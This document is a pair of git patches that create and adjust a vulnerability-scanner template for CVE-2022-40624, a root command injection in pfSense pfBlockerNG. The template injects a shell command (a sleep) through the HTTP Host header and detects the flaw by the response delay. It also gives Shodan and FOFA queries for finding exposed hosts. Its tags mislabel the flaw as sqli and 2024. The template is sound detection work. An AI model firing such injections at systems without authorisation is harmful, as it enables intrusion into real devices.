From ed37b92c773b03e65411d40b15bfe17057146778 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 16 Jan 2025 14:58:22 +0530 Subject: [PATCH 1/2] Create CVE-2022-40624.yaml --- http/cves/2022/CVE-2022-40624.yaml | 57 ++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 http/cves/2022/CVE-2022-40624.yaml diff --git a/http/cves/2022/CVE-2022-40624.yaml b/http/cves/2022/CVE-2022-40624.yaml new file mode 100644 index 00000000000..7bae3f8b8d6 --- /dev/null +++ b/http/cves/2022/CVE-2022-40624.yaml @@ -0,0 +1,57 @@ +id: CVE-2022-40624 + +info: + name: pfSense pfBlockerNG - OS Command Injection + author: ritikchaddha + severity: critical + description: | + pfSense pfBlockerNG through 2.1.4_27 allows remote attackers to execute arbitrary OS commands as root via the HTTP Host header. + impact: | + Allows remote attackers to execute arbitrary code on the affected system + remediation: | + Update to the latest version of pfSense pfBlockerNG to mitigate CVE-2022-40624 + reference: + - https://github.com/dhammon/pfBlockerNg-CVE-2022-40624 + - https://nvd.nist.gov/vuln/detail/CVE-2022-40624 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-40624 + cwe-id: CWE-78 + epss-score: 0.00608 + epss-percentile: 0.78334 + cpe: cpe:2.3:a:pfsense:pfblockerng:*:*:*:*:*:*:*:* + metadata: + vendor: pfsense + product: pfblockerng + shodan-query: "pfBlockerNG" + fofa-query: "pfBlockerNG" + tags: cve,cve2024,pfsense,pfblockerng,rce,sqli,netgate + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /pfblockerng/www/index.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body, "GIF")' + - 'contains(content_type, "image/gif")' + condition: and + internal: true + + - raw: + - |+ + @timeout: 20s + GET /pfblockerng/www/index.php HTTP/1.1 + Host: {{Hostname}}' *; sleep 5; ' + + unsafe: true + matchers: + - type: dsl + dsl: + - duration>=7 From 2b4f68b74dc4855b184f8b15f8ca28df51c9c47f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 20 Jan 2025 07:59:08 +0530 Subject: [PATCH 2/2] Update CVE-2022-40624.yaml --- http/cves/2022/CVE-2022-40624.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-40624.yaml b/http/cves/2022/CVE-2022-40624.yaml index 7bae3f8b8d6..dfef9ef2679 100644 --- a/http/cves/2022/CVE-2022-40624.yaml +++ b/http/cves/2022/CVE-2022-40624.yaml @@ -48,7 +48,7 @@ http: - |+ @timeout: 20s GET /pfblockerng/www/index.php HTTP/1.1 - Host: {{Hostname}}' *; sleep 5; ' + Host: {{Hostname}}' *; sleep 7; ' unsafe: true matchers: